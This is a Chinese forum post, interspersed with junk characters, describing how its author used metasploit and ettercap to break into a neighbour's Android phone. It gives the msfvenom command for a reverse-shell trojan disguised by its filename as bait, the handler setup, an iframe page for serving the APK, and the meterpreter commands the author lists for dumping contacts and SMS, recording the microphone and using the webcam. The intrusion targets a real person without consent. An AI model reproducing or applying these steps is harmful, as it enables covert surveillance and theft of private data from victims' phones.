metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

6 X2 V: S2 i" @% s$ T 五、msf+ettercap入侵邻居安卓手机 & k( r" Z: F- R5 {9 D) \

. m/ z5 x$ w$ W) R% l 首先启动msf + k1 ^4 e" g& p$ h$ p

3 I$ g! @6 L7 J: m$ a% B5 Z 先用kali生成一个安卓木马，如下命令： * W$ d+ q( `& S t; I; L" _

- `; x# r0 \0 j+ X4 U Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ; H* X9 h9 d2 p

4 J# m2 V: B7 A% }: \: s2 L% W 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 O( P/ Z I5 p) Z

6 u/ I3 g/ _1 V( @* D5 r9 E, K 然后进入msf $ E8 U v# f- y$ U" n1 s l; Y

# w' J |4 z% Z5 l use exploit/multi/handler 5 {3 E& _ {8 m0 n) X- U& q

3 W/ n* A. M3 ^, x9 K set payload android/meterpreter/reverse_tcp - I: i/ c* l3 }: t% A

9 p( u* t' n' j& G set LHOST 192.168.0.109 //ip为kaili的ip # y( @, p* V: z" q

7 h+ E6 I- v4 n! Z& k- i0 n" j set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ) x! C8 s/ H7 t1 N

6 l0 d% c3 `1 w0 ~7 G1 X Exploit T. \" P8 o% L/ \4 ]2 A6 B

, P2 K+ q2 R$ s' G# Z / ]9 {0 N. u! H8 f+ Z2 u

& `/ w) ~7 J N5 G7 N& L 下面我们开启ettercap -G ! L% b7 \- Z2 ]

5 g' B( p& ~, C; O) s 我物理IP为 9 x% m8 B5 b" D W/ e

. Q2 k0 ]2 v5 l7 @- b 4 {+ D9 I. }: a: L1 m( ^

0 L# P$ r, `) _7 q" \ 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， : n' S# R | \

9 `% n6 B5 Q2 X, x" k( F) C 下面我们来设置一下 0 I4 f; J0 V# m; c$ [, @2 _; l' }: m

, E/ R& T/ S7 c7 c1 F 3 c4 ? m I% ^ ~; D

; I7 g p" C$ K 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， , H4 ^( A4 |6 z

4 C O6 o) `/ F4 ^3 M3 y 6 ~9 c- s9 G( Z \

$ E( \5 {( K+ @- L& L I$ S ! H0 I0 \/ G; ?5 f U, h

/ U* x5 E! @, Y2 e2 F3 S 8 P7 H, V/ j* g

/ k/ j8 E' b+ \9 T , a7 ?8 Q5 j; c* D

+ r" w# V: I! N 4 q# _ K/ {2 X+ U& D$ F4 P

- N0 j4 j( e/ D! X R 9 g* }2 Y& p$ J8 h% ]1 |

7 ^* F6 u/ k# M) e5 `" G( C0 q; | # \) R0 O. ^6 ?! `5 H

( l( w+ R7 N7 P3 y% E. ] " F5 T; x& L# ~8 {7 v

5 u, W+ {+ D8 X g% Z) s% ^. Y$ [" v8 A* F9 ~5 }

; Z1 b. \8 \% A0 i+ R 7 [3 c' p' \5 H" [1 o9 h5 c" i/ t

) \& `$ f+ ]0 R# V - h" S2 J ?2 v' A8 ?+ Z8 `( o; E

5 }# o* T) J( Z I4 q9 ]9 k0 J

4 N3 D! E9 T3 d* ` # O4 W5 I, f+ X

" W- h, ~: K8 A' p 下面我们开始攻击 / c* c5 B! k6 ]& I

, V2 H! M9 t! A( |) b5 V7 ]8 _ / I, E- W/ E, r' G2 Q4 t! i2 ?

4 ]$ ?3 i. @/ d0 ] ?0 l # y" [9 f+ d8 u7 W

" m3 L7 p w. W" H 8 L- U9 W2 T7 D* @' z" w' A

0 V T0 Y) A- p9 T : w' }" n* O/ I( {) l/ p

c1 \/ E4 `% {& S0 L$ U% u " G3 G# P0 L0 t. {) c

! [, R% e8 ~! _0 m2 H1 J2 M 大概过了5分钟多，发现反弹成功了 ' l, R" q7 H7 R9 T. ^

1 y- M5 F" E) w' C & a9 M& O( q: f& e

# U; S, @! [3 y# ] ' X1 i3 J3 n" |" L r; M8 V0 u6 n

& J' W+ Z S# l9 [ & k( n M% P2 d" d0 ^

/ e7 }% H. R# F, R6 K8 R7 d ; h9 z# t& G- y* f9 c- x: ~

0 B( p! A, O! s- J ; J0 w( Q& J- L' y! l$ u: X/ \

# y) E D$ ~/ y' V4 l$ \; @ " w3 h/ z, N8 Z/ g. i

# M. ^) g. B0 R* G! \" D7 ] 4 t" Z& k* m) b( A$ _6 R

3 u& Q- }( V1 g' C6 V 执行命令 / U4 Y, d2 N$ k. F) n0 Y T% Q

8 `8 o$ n; ^. N1 O 6 l: S, t8 i2 `# l% y# \- m

$ E& H6 o; L/ L" z8 n dump_contacts --》这个是导出电话 7 k M+ O: }& H' I8 _

0 X1 H: _! M8 u6 r dump_sms --》这个是导出信息 % n3 Z; [" |: L; {( n4 ~6 [" c* F

. y% R( S- ]# r/ I record_mic Record audio from the default microphone for X seconds # ]0 @5 T7 ]0 N- S% k; ?' m

9 Q# e/ g7 }- l3 r) R$ p webcam_chat Start a video chat 0 V2 }* a& ?" ^4 g6 l. y0 W! E+ E v

$ }5 L$ R, b2 Z! l. ]( v+ _% N. R webcam_list List webcams 0 p' _0 n, b4 t9 x5 s. ~

2 ^' ], T! U6 \1 U webcam_snap Take a snapshot from the specified webcam 3 o+ `/ o: K: T5 d4 i! Z

, @' y( A( r- |+ P webcam_stream lay a video stream from the specified webcam , c; H- R8 B$ O3 R+ ^ x

6 L7 V2 K1 @' t8 U# a+ [ / w* ]' `& S. v) M# J5 v8 }

1 a6 A' v0 m8 `2 {3 R, d9 X + K0 a' q, h: W

7 l2 v. {2 | v1 P+ f& i0 l 我们打开看一下电话薄， 9 o: @9 k' q4 ^% K" S$ v4 j7 T

' ^9 X& d$ ]! ~+ T: l" r6 f' S 7 \% o2 e* @' F0 l: U( o

; E) l8 o5 a/ ? g7 s! [- s, I $ a4 Z; B5 ]1 @3 ?1 R9 M/ ^3 w

. M$ k3 z+ P. T3 |& z0 C' M ( [: `$ f/ g3 I% M1 {

; G& C' `4 o! N q% r) o 2 F& y% X' J( c7 {0 ]% G! M

6 J. Q0 `1 I w4 v b0 m% h- c/ g% i6 b , d* M6 u* K# }4 ^# @8 ]

/ L' r' o; M+ \ a 1 \% A J. `& r$ T! I

7 }) \* p% U1 u0 z" V4 ]1 K 我们同时欺骗成DroidJack木马，使用方法如图： & u% E& o D7 O+ y7 Q7 v$ @

- `9 V, L1 Y9 {4 |, V+ Y: d, E : K3 q2 s' ^6 J. C( R& K

- k; ~2 Q, B8 K9 Z) Z, r: u 9 M) n+ \3 {( B; l0 a4 r" E

% c! l$ [* ^+ z $ m. y$ B+ y8 p8 M) u; K

/ ?4 r4 A0 `0 m% u8 N& R3 N6 J 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 / Z! `& G5 J9 ]' m) \' b

2 @( o" `( g: U$ a, J # z- q$ s9 N1 p

' ]* o. N' I, s3 d3 ?) }) B& ?' Z 5 |, V* n4 u7 @6 ]$ h+ P/ j

% l0 E& \8 R+ P7 B& K' I# i- L0 L: _9 N 3 `) ^4 f* l/ `( W+ I# [

2 |% ~) G% B( X' P ( v& L' m+ I6 F* z- h# x

' h8 k# j Z, h
5 y F2 }" H# N. M

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块